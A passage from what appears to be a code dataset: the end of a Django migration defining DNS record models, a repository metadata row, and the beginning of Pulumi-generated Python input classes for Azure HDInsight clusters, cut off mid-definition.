'verbose_name': 'A record',
'verbose_name_plural': 'A records',
},
bases=('dnsmanager.record',),
),
migrations.CreateModel(
name='CanonicalNameRecord',
fields=[
('record_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='dnsmanager.Record')),
('c_name', models.CharField(help_text='This domain name will alias to this canonical name.', max_length=253, verbose_name='canonical name')),
],
options={
'verbose_name': 'CNAME record',
'verbose_name_plural': 'CNAME records',
'ordering': ['c_name'],
},
bases=('dnsmanager.record',),
),
migrations.CreateModel(
name='CertificationAuthorityAuthorizationRecord',
fields=[
('record_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='dnsmanager.Record')),
('flags', models.PositiveIntegerField(validators=[django.core.validators.MinValueValidator(0), django.core.validators.MaxValueValidator(255)], verbose_name='flags')),
('tag', models.CharField(choices=[('issue', 'issue'), ('issuewild', 'issue wildcard'), ('iodef', 'Incident object description exchange format')], max_length=255, verbose_name='tag')),
('value', models.CharField(max_length=511, verbose_name='value')),
],
options={
'verbose_name': 'CAA record',
'verbose_name_plural': 'CAA records',
'ordering': ['flags'],
},
bases=('dnsmanager.record',),
),
migrations.CreateModel(
name='DelegationNameRecord',
fields=[
('record_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='dnsmanager.Record')),
('d_name', models.CharField(help_text='This domain name will alias to the entire subtree of that delegation domain.', max_length=253, validators=[django.core.validators.RegexValidator(message='Not a valid domain name', regex='(?:[a-zA-Z0-9][a-zA-Z0-9-]{0,62}(?<!-)\\.)*(?:[a-zA-Z0-9][a-zA-Z0-9-]{0,62}(?<!-))')], verbose_name='delegation domain name')),
],
options={
'verbose_name': 'DNAME record',
'verbose_name_plural': 'DNAME records',
'ordering': ['d_name'],
},
bases=('dnsmanager.record',),
),
migrations.CreateModel(
name='Ipv6AddressRecord',
fields=[
('record_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='dnsmanager.Record')),
('address', models.GenericIPAddressField(protocol='IPv6', verbose_name='IPv6 address')),
],
options={
'verbose_name': 'AAAA record',
'verbose_name_plural': 'AAAA records',
},
bases=('dnsmanager.record',),
),
migrations.CreateModel(
name='MailExchangeRecord',
fields=[
('record_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='dnsmanager.Record')),
('preference', models.PositiveIntegerField(validators=[django.core.validators.MinValueValidator(0), django.core.validators.MaxValueValidator(65535)], verbose_name='preference')),
('exchange', models.CharField(default='@', max_length=253, validators=[django.core.validators.RegexValidator(message='Not a valid domain name', regex='(?:[a-zA-Z0-9][a-zA-Z0-9-]{0,62}(?<!-)\\.)*(?:[a-zA-Z0-9][a-zA-Z0-9-]{0,62}(?<!-))')], verbose_name='exchange server')),
],
options={
'verbose_name': 'MX record',
'verbose_name_plural': 'MX records',
'ordering': ['preference'],
},
bases=('dnsmanager.record',),
),
migrations.CreateModel(
name='NameServerRecord',
fields=[
('record_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='dnsmanager.Record')),
('nsdname', models.CharField(default='@', max_length=253, validators=[django.core.validators.RegexValidator(message='Not a valid domain name', regex='(?:[a-zA-Z0-9][a-zA-Z0-9-]{0,62}(?<!-)\\.)*(?:[a-zA-Z0-9][a-zA-Z0-9-]{0,62}(?<!-))')], verbose_name='name server')),
],
options={
'verbose_name': 'NS record',
'verbose_name_plural': 'NS records',
'ordering': ['nsdname'],
},
bases=('dnsmanager.record',),
),
migrations.CreateModel(
name='PointerRecord',
fields=[
('record_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='dnsmanager.Record')),
('ptrdname', models.CharField(max_length=253, validators=[django.core.validators.RegexValidator(message='Not a valid domain name', regex='(?:[a-zA-Z0-9][a-zA-Z0-9-]{0,62}(?<!-)\\.)*(?:[a-zA-Z0-9][a-zA-Z0-9-]{0,62}(?<!-))')], verbose_name='pointer domain name')),
],
options={
'verbose_name': 'PTR record',
'verbose_name_plural': 'PTR records',
'ordering': ['ptrdname'],
},
bases=('dnsmanager.record',),
),
migrations.CreateModel(
name='ServiceRecord',
fields=[
('record_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='dnsmanager.Record')),
('service', models.CharField(help_text='The symbolic name of the desired service.', max_length=253, verbose_name='service')),
('protocol', models.CharField(help_text='The transport protocol of the desired service, usually either TCP or UDP.', max_length=253, verbose_name='protocol')),
('priority', models.PositiveIntegerField(help_text='The priority of the target host, lower value means more preferred.', validators=[django.core.validators.MinValueValidator(0), django.core.validators.MaxValueValidator(65535)], verbose_name='priority')),
('weight', models.PositiveIntegerField(help_text='A relative weight for records with the same priority, higher value means higher chance of getting picked.', validators=[django.core.validators.MinValueValidator(0), django.core.validators.MaxValueValidator(65535)], verbose_name='weight')),
('port', models.PositiveIntegerField(validators=[django.core.validators.MinValueValidator(1), django.core.validators.MaxValueValidator(65535)], verbose_name='port')),
('target', models.CharField(help_text='The canonical hostname of the machine providing the service, ending in a dot.', max_length=253, validators=[django.core.validators.RegexValidator(message='Not a valid domain name', regex='(?:[a-zA-Z0-9][a-zA-Z0-9-]{0,62}(?<!-)\\.)*(?:[a-zA-Z0-9][a-zA-Z0-9-]{0,62}(?<!-))')], verbose_name='target')),
],
options={
'verbose_name': 'SRV record',
'verbose_name_plural': 'SRV records',
'ordering': ['priority', 'target'],
},
bases=('dnsmanager.record',),
),
migrations.CreateModel(
name='SshFingerprintRecord',
fields=[
('record_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='dnsmanager.Record')),
('algorithm', models.PositiveIntegerField(choices=[(1, 'RSA'), (2, 'DSA'), (3, 'ECDSA'), (4, 'Ed25519')], validators=[django.core.validators.MinValueValidator(1), django.core.validators.MaxValueValidator(4)], verbose_name='algorithm')),
('type', models.PositiveIntegerField(choices=[(1, 'SHA-1'), (2, 'SHA-256')], validators=[django.core.validators.MinValueValidator(1), django.core.validators.MaxValueValidator(2)], verbose_name='type')),
('fingerprint', models.CharField(max_length=64, verbose_name='fingerprint')),
],
options={
'verbose_name': 'SSHFP record',
'verbose_name_plural': 'SSHFP records',
'ordering': ['algorithm'],
},
bases=('dnsmanager.record',),
),
migrations.CreateModel(
name='StartOfAuthorityRecord',
fields=[
('record_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='dnsmanager.Record')),
('mname', models.CharField(help_text='Primary master name server for this zone.', max_length=253, validators=[django.core.validators.RegexValidator(message='Not a valid domain name', regex='(?:[a-zA-Z0-9][a-zA-Z0-9-]{0,62}(?<!-)\\.)*(?:[a-zA-Z0-9][a-zA-Z0-9-]{0,62}(?<!-))')], verbose_name='master name server')),
('rname', models.EmailField(help_text='Email address of the administrator responsible for this zone.', max_length=254, verbose_name='responsible email')),
('serial', models.BigIntegerField(help_text='A slave name server will initiate a zone transfer if this serial is incremented.', verbose_name='serial number')),
('refresh', models.BigIntegerField(default=86400, help_text='Number of seconds after which secondary name servers should query the master to detect zone changes.', verbose_name='refresh')),
('retry', models.BigIntegerField(default=7200, help_text='Number of seconds after which secondary name servers should retry to request the serial number from the master if the master does not respond.', verbose_name='retry')),
('expire', models.BigIntegerField(default=3600000, help_text='Number of seconds after which secondary name servers should stop answering request for this zone if the master does not respond.', verbose_name='expire')),
('minimum', models.BigIntegerField(default=172800, help_text='Time to live for purposes of negative caching.', verbose_name='minimum')),
],
options={
'verbose_name': 'SOA record',
'verbose_name_plural': 'SOA records',
'ordering': ['mname'],
},
bases=('dnsmanager.record',),
),
migrations.CreateModel(
name='TextRecord',
fields=[
('record_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='dnsmanager.Record')),
('data', models.TextField()),
],
options={
'verbose_name': 'TXT record',
'verbose_name_plural': 'TXT records',
},
bases=('dnsmanager.record',),
),
migrations.AddField(
model_name='record',
name='zone',
field=models.ForeignKey(help_text='This record will be applied on that zone.', on_delete=django.db.models.deletion.CASCADE, to='dnsmanager.Zone', verbose_name='zone'),
),
]
| 66.9 | 369 | 0.608099 |
ace0a0d71b6a8f224865e1ffce3ac61e1fe45965 | 359,486 | py | Python | sdk/python/pulumi_azure/hdinsight/_inputs.py | roderik/pulumi-azure | f6d0c058d6f9111a709bc5f1515d1638f9d615f0 | [
"ECL-2.0",
"Apache-2.0"
] | 109 | 2018-06-18T00:19:44.000Z | 2022-02-20T05:32:57.000Z | sdk/python/pulumi_azure/hdinsight/_inputs.py | roderik/pulumi-azure | f6d0c058d6f9111a709bc5f1515d1638f9d615f0 | [
"ECL-2.0",
"Apache-2.0"
] | 663 | 2018-06-18T21:08:46.000Z | 2022-03-31T20:10:11.000Z | sdk/python/pulumi_azure/hdinsight/_inputs.py | roderik/pulumi-azure | f6d0c058d6f9111a709bc5f1515d1638f9d615f0 | [
"ECL-2.0",
"Apache-2.0"
] | 41 | 2018-07-19T22:37:38.000Z | 2022-03-14T10:56:26.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'HBaseClusterComponentVersionArgs',
'HBaseClusterGatewayArgs',
'HBaseClusterMetastoresArgs',
'HBaseClusterMetastoresAmbariArgs',
'HBaseClusterMetastoresHiveArgs',
'HBaseClusterMetastoresOozieArgs',
'HBaseClusterMonitorArgs',
'HBaseClusterRolesArgs',
'HBaseClusterRolesHeadNodeArgs',
'HBaseClusterRolesWorkerNodeArgs',
'HBaseClusterRolesWorkerNodeAutoscaleArgs',
'HBaseClusterRolesWorkerNodeAutoscaleRecurrenceArgs',
'HBaseClusterRolesWorkerNodeAutoscaleRecurrenceScheduleArgs',
'HBaseClusterRolesZookeeperNodeArgs',
'HBaseClusterSecurityProfileArgs',
'HBaseClusterStorageAccountArgs',
'HBaseClusterStorageAccountGen2Args',
'HadoopClusterComponentVersionArgs',
'HadoopClusterGatewayArgs',
'HadoopClusterMetastoresArgs',
'HadoopClusterMetastoresAmbariArgs',
'HadoopClusterMetastoresHiveArgs',
'HadoopClusterMetastoresOozieArgs',
'HadoopClusterMonitorArgs',
'HadoopClusterNetworkArgs',
'HadoopClusterRolesArgs',
'HadoopClusterRolesEdgeNodeArgs',
'HadoopClusterRolesEdgeNodeInstallScriptActionArgs',
'HadoopClusterRolesHeadNodeArgs',
'HadoopClusterRolesWorkerNodeArgs',
'HadoopClusterRolesWorkerNodeAutoscaleArgs',
'HadoopClusterRolesWorkerNodeAutoscaleCapacityArgs',
'HadoopClusterRolesWorkerNodeAutoscaleRecurrenceArgs',
'HadoopClusterRolesWorkerNodeAutoscaleRecurrenceScheduleArgs',
'HadoopClusterRolesZookeeperNodeArgs',
'HadoopClusterSecurityProfileArgs',
'HadoopClusterStorageAccountArgs',
'HadoopClusterStorageAccountGen2Args',
'InteractiveQueryClusterComponentVersionArgs',
'InteractiveQueryClusterGatewayArgs',
'InteractiveQueryClusterMetastoresArgs',
'InteractiveQueryClusterMetastoresAmbariArgs',
'InteractiveQueryClusterMetastoresHiveArgs',
'InteractiveQueryClusterMetastoresOozieArgs',
'InteractiveQueryClusterMonitorArgs',
'InteractiveQueryClusterNetworkArgs',
'InteractiveQueryClusterRolesArgs',
'InteractiveQueryClusterRolesHeadNodeArgs',
'InteractiveQueryClusterRolesWorkerNodeArgs',
'InteractiveQueryClusterRolesWorkerNodeAutoscaleArgs',
'InteractiveQueryClusterRolesWorkerNodeAutoscaleCapacityArgs',
'InteractiveQueryClusterRolesWorkerNodeAutoscaleRecurrenceArgs',
'InteractiveQueryClusterRolesWorkerNodeAutoscaleRecurrenceScheduleArgs',
'InteractiveQueryClusterRolesZookeeperNodeArgs',
'InteractiveQueryClusterSecurityProfileArgs',
'InteractiveQueryClusterStorageAccountArgs',
'InteractiveQueryClusterStorageAccountGen2Args',
'KafkaClusterComponentVersionArgs',
'KafkaClusterGatewayArgs',
'KafkaClusterMetastoresArgs',
'KafkaClusterMetastoresAmbariArgs',
'KafkaClusterMetastoresHiveArgs',
'KafkaClusterMetastoresOozieArgs',
'KafkaClusterMonitorArgs',
'KafkaClusterRestProxyArgs',
'KafkaClusterRolesArgs',
'KafkaClusterRolesHeadNodeArgs',
'KafkaClusterRolesKafkaManagementNodeArgs',
'KafkaClusterRolesWorkerNodeArgs',
'KafkaClusterRolesZookeeperNodeArgs',
'KafkaClusterSecurityProfileArgs',
'KafkaClusterStorageAccountArgs',
'KafkaClusterStorageAccountGen2Args',
'MLServicesClusterGatewayArgs',
'MLServicesClusterRolesArgs',
'MLServicesClusterRolesEdgeNodeArgs',
'MLServicesClusterRolesHeadNodeArgs',
'MLServicesClusterRolesWorkerNodeArgs',
'MLServicesClusterRolesZookeeperNodeArgs',
'MLServicesClusterStorageAccountArgs',
'RServerClusterGatewayArgs',
'RServerClusterRolesArgs',
'RServerClusterRolesEdgeNodeArgs',
'RServerClusterRolesHeadNodeArgs',
'RServerClusterRolesWorkerNodeArgs',
'RServerClusterRolesZookeeperNodeArgs',
'RServerClusterStorageAccountArgs',
'SparkClusterComponentVersionArgs',
'SparkClusterGatewayArgs',
'SparkClusterMetastoresArgs',
'SparkClusterMetastoresAmbariArgs',
'SparkClusterMetastoresHiveArgs',
'SparkClusterMetastoresOozieArgs',
'SparkClusterMonitorArgs',
'SparkClusterNetworkArgs',
'SparkClusterRolesArgs',
'SparkClusterRolesHeadNodeArgs',
'SparkClusterRolesWorkerNodeArgs',
'SparkClusterRolesWorkerNodeAutoscaleArgs',
'SparkClusterRolesWorkerNodeAutoscaleCapacityArgs',
'SparkClusterRolesWorkerNodeAutoscaleRecurrenceArgs',
'SparkClusterRolesWorkerNodeAutoscaleRecurrenceScheduleArgs',
'SparkClusterRolesZookeeperNodeArgs',
'SparkClusterSecurityProfileArgs',
'SparkClusterStorageAccountArgs',
'SparkClusterStorageAccountGen2Args',
'StormClusterComponentVersionArgs',
'StormClusterGatewayArgs',
'StormClusterMetastoresArgs',
'StormClusterMetastoresAmbariArgs',
'StormClusterMetastoresHiveArgs',
'StormClusterMetastoresOozieArgs',
'StormClusterMonitorArgs',
'StormClusterRolesArgs',
'StormClusterRolesHeadNodeArgs',
'StormClusterRolesWorkerNodeArgs',
'StormClusterRolesZookeeperNodeArgs',
'StormClusterStorageAccountArgs',
]
@pulumi.input_type
class HBaseClusterComponentVersionArgs:
def __init__(__self__, *,
hbase: pulumi.Input[str]):
"""
:param pulumi.Input[str] hbase: The version of HBase which should be used for this HDInsight HBase Cluster. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "hbase", hbase)
@property
@pulumi.getter
def hbase(self) -> pulumi.Input[str]:
"""
The version of HBase which should be used for this HDInsight HBase Cluster. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "hbase")
@hbase.setter
def hbase(self, value: pulumi.Input[str]):
pulumi.set(self, "hbase", value)
@pulumi.input_type
class HBaseClusterGatewayArgs:
def __init__(__self__, *,
password: pulumi.Input[str],
username: pulumi.Input[str],
enabled: Optional[pulumi.Input[bool]] = None):
"""
:param pulumi.Input[str] password: The password used for the Ambari Portal.
:param pulumi.Input[str] username: The username used for the Ambari Portal. Changing this forces a new resource to be created.
:param pulumi.Input[bool] enabled: Is the Ambari portal enabled? The HDInsight API doesn't support disabling gateway anymore.
"""
pulumi.set(__self__, "password", password)
pulumi.set(__self__, "username", username)
if enabled is not None:
warnings.warn("""HDInsight doesn't support disabling gateway anymore""", DeprecationWarning)
pulumi.log.warn("""enabled is deprecated: HDInsight doesn't support disabling gateway anymore""")
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
@property
@pulumi.getter
def password(self) -> pulumi.Input[str]:
"""
The password used for the Ambari Portal.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: pulumi.Input[str]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The username used for the Ambari Portal. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Is the Ambari portal enabled? The HDInsight API doesn't support disabling gateway anymore.
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@pulumi.input_type
class HBaseClusterMetastoresArgs:
def __init__(__self__, *,
ambari: Optional[pulumi.Input['HBaseClusterMetastoresAmbariArgs']] = None,
hive: Optional[pulumi.Input['HBaseClusterMetastoresHiveArgs']] = None,
oozie: Optional[pulumi.Input['HBaseClusterMetastoresOozieArgs']] = None):
"""
:param pulumi.Input['HBaseClusterMetastoresAmbariArgs'] ambari: An `ambari` block as defined below.
:param pulumi.Input['HBaseClusterMetastoresHiveArgs'] hive: A `hive` block as defined below.
:param pulumi.Input['HBaseClusterMetastoresOozieArgs'] oozie: An `oozie` block as defined below.
"""
if ambari is not None:
pulumi.set(__self__, "ambari", ambari)
if hive is not None:
pulumi.set(__self__, "hive", hive)
if oozie is not None:
pulumi.set(__self__, "oozie", oozie)
@property
@pulumi.getter
def ambari(self) -> Optional[pulumi.Input['HBaseClusterMetastoresAmbariArgs']]:
"""
An `ambari` block as defined below.
"""
return pulumi.get(self, "ambari")
@ambari.setter
def ambari(self, value: Optional[pulumi.Input['HBaseClusterMetastoresAmbariArgs']]):
pulumi.set(self, "ambari", value)
@property
@pulumi.getter
def hive(self) -> Optional[pulumi.Input['HBaseClusterMetastoresHiveArgs']]:
"""
A `hive` block as defined below.
"""
return pulumi.get(self, "hive")
@hive.setter
def hive(self, value: Optional[pulumi.Input['HBaseClusterMetastoresHiveArgs']]):
pulumi.set(self, "hive", value)
@property
@pulumi.getter
def oozie(self) -> Optional[pulumi.Input['HBaseClusterMetastoresOozieArgs']]:
"""
An `oozie` block as defined below.
"""
return pulumi.get(self, "oozie")
@oozie.setter
def oozie(self, value: Optional[pulumi.Input['HBaseClusterMetastoresOozieArgs']]):
pulumi.set(self, "oozie", value)
@pulumi.input_type
class HBaseClusterMetastoresAmbariArgs:
def __init__(__self__, *,
database_name: pulumi.Input[str],
password: pulumi.Input[str],
server: pulumi.Input[str],
username: pulumi.Input[str]):
"""
:param pulumi.Input[str] database_name: The external Hive metastore's existing SQL database. Changing this forces a new resource to be created.
:param pulumi.Input[str] password: The external Ambari metastore's existing SQL server admin password. Changing this forces a new resource to be created.
:param pulumi.Input[str] server: The fully-qualified domain name (FQDN) of the SQL server to use for the external Ambari metastore. Changing this forces a new resource to be created.
:param pulumi.Input[str] username: The external Ambari metastore's existing SQL server admin username. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "database_name", database_name)
pulumi.set(__self__, "password", password)
pulumi.set(__self__, "server", server)
pulumi.set(__self__, "username", username)
@property
@pulumi.getter(name="databaseName")
def database_name(self) -> pulumi.Input[str]:
"""
The external Hive metastore's existing SQL database. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "database_name")
@database_name.setter
def database_name(self, value: pulumi.Input[str]):
pulumi.set(self, "database_name", value)
@property
@pulumi.getter
def password(self) -> pulumi.Input[str]:
"""
The external Ambari metastore's existing SQL server admin password. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: pulumi.Input[str]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def server(self) -> pulumi.Input[str]:
"""
The fully-qualified domain name (FQDN) of the SQL server to use for the external Ambari metastore. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "server")
@server.setter
def server(self, value: pulumi.Input[str]):
pulumi.set(self, "server", value)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The external Ambari metastore's existing SQL server admin username. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@pulumi.input_type
class HBaseClusterMetastoresHiveArgs:
def __init__(__self__, *,
database_name: pulumi.Input[str],
password: pulumi.Input[str],
server: pulumi.Input[str],
username: pulumi.Input[str]):
"""
:param pulumi.Input[str] database_name: The external Hive metastore's existing SQL database. Changing this forces a new resource to be created.
:param pulumi.Input[str] password: The external Hive metastore's existing SQL server admin password. Changing this forces a new resource to be created.
:param pulumi.Input[str] server: The fully-qualified domain name (FQDN) of the SQL server to use for the external Hive metastore. Changing this forces a new resource to be created.
:param pulumi.Input[str] username: The external Hive metastore's existing SQL server admin username. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "database_name", database_name)
pulumi.set(__self__, "password", password)
pulumi.set(__self__, "server", server)
pulumi.set(__self__, "username", username)
@property
@pulumi.getter(name="databaseName")
def database_name(self) -> pulumi.Input[str]:
"""
The external Hive metastore's existing SQL database. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "database_name")
@database_name.setter
def database_name(self, value: pulumi.Input[str]):
pulumi.set(self, "database_name", value)
@property
@pulumi.getter
def password(self) -> pulumi.Input[str]:
"""
The external Hive metastore's existing SQL server admin password. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: pulumi.Input[str]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def server(self) -> pulumi.Input[str]:
"""
The fully-qualified domain name (FQDN) of the SQL server to use for the external Hive metastore. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "server")
@server.setter
def server(self, value: pulumi.Input[str]):
pulumi.set(self, "server", value)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The external Hive metastore's existing SQL server admin username. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@pulumi.input_type
class HBaseClusterMetastoresOozieArgs:
def __init__(__self__, *,
database_name: pulumi.Input[str],
password: pulumi.Input[str],
server: pulumi.Input[str],
username: pulumi.Input[str]):
"""
:param pulumi.Input[str] database_name: The external Oozie metastore's existing SQL database. Changing this forces a new resource to be created.
:param pulumi.Input[str] password: The external Oozie metastore's existing SQL server admin password. Changing this forces a new resource to be created.
:param pulumi.Input[str] server: The fully-qualified domain name (FQDN) of the SQL server to use for the external Oozie metastore. Changing this forces a new resource to be created.
:param pulumi.Input[str] username: The external Oozie metastore's existing SQL server admin username. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "database_name", database_name)
pulumi.set(__self__, "password", password)
pulumi.set(__self__, "server", server)
pulumi.set(__self__, "username", username)
@property
@pulumi.getter(name="databaseName")
def database_name(self) -> pulumi.Input[str]:
"""
The external Oozie metastore's existing SQL database. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "database_name")
@database_name.setter
def database_name(self, value: pulumi.Input[str]):
pulumi.set(self, "database_name", value)
@property
@pulumi.getter
def password(self) -> pulumi.Input[str]:
"""
The external Oozie metastore's existing SQL server admin password. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: pulumi.Input[str]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def server(self) -> pulumi.Input[str]:
"""
The fully-qualified domain name (FQDN) of the SQL server to use for the external Oozie metastore. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "server")
@server.setter
def server(self, value: pulumi.Input[str]):
pulumi.set(self, "server", value)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The external Oozie metastore's existing SQL server admin username. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@pulumi.input_type
class HBaseClusterMonitorArgs:
def __init__(__self__, *,
log_analytics_workspace_id: pulumi.Input[str],
primary_key: pulumi.Input[str]):
"""
:param pulumi.Input[str] log_analytics_workspace_id: The Operations Management Suite (OMS) workspace ID.
:param pulumi.Input[str] primary_key: The Operations Management Suite (OMS) workspace key.
"""
pulumi.set(__self__, "log_analytics_workspace_id", log_analytics_workspace_id)
pulumi.set(__self__, "primary_key", primary_key)
@property
@pulumi.getter(name="logAnalyticsWorkspaceId")
def log_analytics_workspace_id(self) -> pulumi.Input[str]:
"""
The Operations Management Suite (OMS) workspace ID.
"""
return pulumi.get(self, "log_analytics_workspace_id")
@log_analytics_workspace_id.setter
def log_analytics_workspace_id(self, value: pulumi.Input[str]):
pulumi.set(self, "log_analytics_workspace_id", value)
@property
@pulumi.getter(name="primaryKey")
def primary_key(self) -> pulumi.Input[str]:
"""
The Operations Management Suite (OMS) workspace key.
"""
return pulumi.get(self, "primary_key")
@primary_key.setter
def primary_key(self, value: pulumi.Input[str]):
pulumi.set(self, "primary_key", value)
@pulumi.input_type
class HBaseClusterRolesArgs:
def __init__(__self__, *,
head_node: pulumi.Input['HBaseClusterRolesHeadNodeArgs'],
worker_node: pulumi.Input['HBaseClusterRolesWorkerNodeArgs'],
zookeeper_node: pulumi.Input['HBaseClusterRolesZookeeperNodeArgs']):
"""
:param pulumi.Input['HBaseClusterRolesHeadNodeArgs'] head_node: A `head_node` block as defined above.
:param pulumi.Input['HBaseClusterRolesWorkerNodeArgs'] worker_node: A `worker_node` block as defined below.
:param pulumi.Input['HBaseClusterRolesZookeeperNodeArgs'] zookeeper_node: A `zookeeper_node` block as defined below.
"""
pulumi.set(__self__, "head_node", head_node)
pulumi.set(__self__, "worker_node", worker_node)
pulumi.set(__self__, "zookeeper_node", zookeeper_node)
@property
@pulumi.getter(name="headNode")
def head_node(self) -> pulumi.Input['HBaseClusterRolesHeadNodeArgs']:
"""
A `head_node` block as defined above.
"""
return pulumi.get(self, "head_node")
@head_node.setter
def head_node(self, value: pulumi.Input['HBaseClusterRolesHeadNodeArgs']):
pulumi.set(self, "head_node", value)
@property
@pulumi.getter(name="workerNode")
def worker_node(self) -> pulumi.Input['HBaseClusterRolesWorkerNodeArgs']:
"""
A `worker_node` block as defined below.
"""
return pulumi.get(self, "worker_node")
@worker_node.setter
def worker_node(self, value: pulumi.Input['HBaseClusterRolesWorkerNodeArgs']):
pulumi.set(self, "worker_node", value)
@property
@pulumi.getter(name="zookeeperNode")
def zookeeper_node(self) -> pulumi.Input['HBaseClusterRolesZookeeperNodeArgs']:
"""
A `zookeeper_node` block as defined below.
"""
return pulumi.get(self, "zookeeper_node")
@zookeeper_node.setter
def zookeeper_node(self, value: pulumi.Input['HBaseClusterRolesZookeeperNodeArgs']):
pulumi.set(self, "zookeeper_node", value)
@pulumi.input_type
class HBaseClusterRolesHeadNodeArgs:
def __init__(__self__, *,
username: pulumi.Input[str],
vm_size: pulumi.Input[str],
password: Optional[pulumi.Input[str]] = None,
ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
virtual_network_id: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] username: The Username of the local administrator for the Head Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] vm_size: The Size of the Virtual Machine which should be used as the Head Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] password: The Password associated with the local administrator for the Head Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: A list of SSH Keys which should be used for the local administrator on the Head Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] subnet_id: The ID of the Subnet within the Virtual Network where the Head Nodes should be provisioned within. Changing this forces a new resource to be created.
:param pulumi.Input[str] virtual_network_id: The ID of the Virtual Network where the Head Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "username", username)
pulumi.set(__self__, "vm_size", vm_size)
if password is not None:
pulumi.set(__self__, "password", password)
if ssh_keys is not None:
pulumi.set(__self__, "ssh_keys", ssh_keys)
if subnet_id is not None:
pulumi.set(__self__, "subnet_id", subnet_id)
if virtual_network_id is not None:
pulumi.set(__self__, "virtual_network_id", virtual_network_id)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The Username of the local administrator for the Head Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@property
@pulumi.getter(name="vmSize")
def vm_size(self) -> pulumi.Input[str]:
"""
The Size of the Virtual Machine which should be used as the Head Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "vm_size")
@vm_size.setter
def vm_size(self, value: pulumi.Input[str]):
pulumi.set(self, "vm_size", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
The Password associated with the local administrator for the Head Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="sshKeys")
def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of SSH Keys which should be used for the local administrator on the Head Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "ssh_keys")
@ssh_keys.setter
def ssh_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "ssh_keys", value)
@property
@pulumi.getter(name="subnetId")
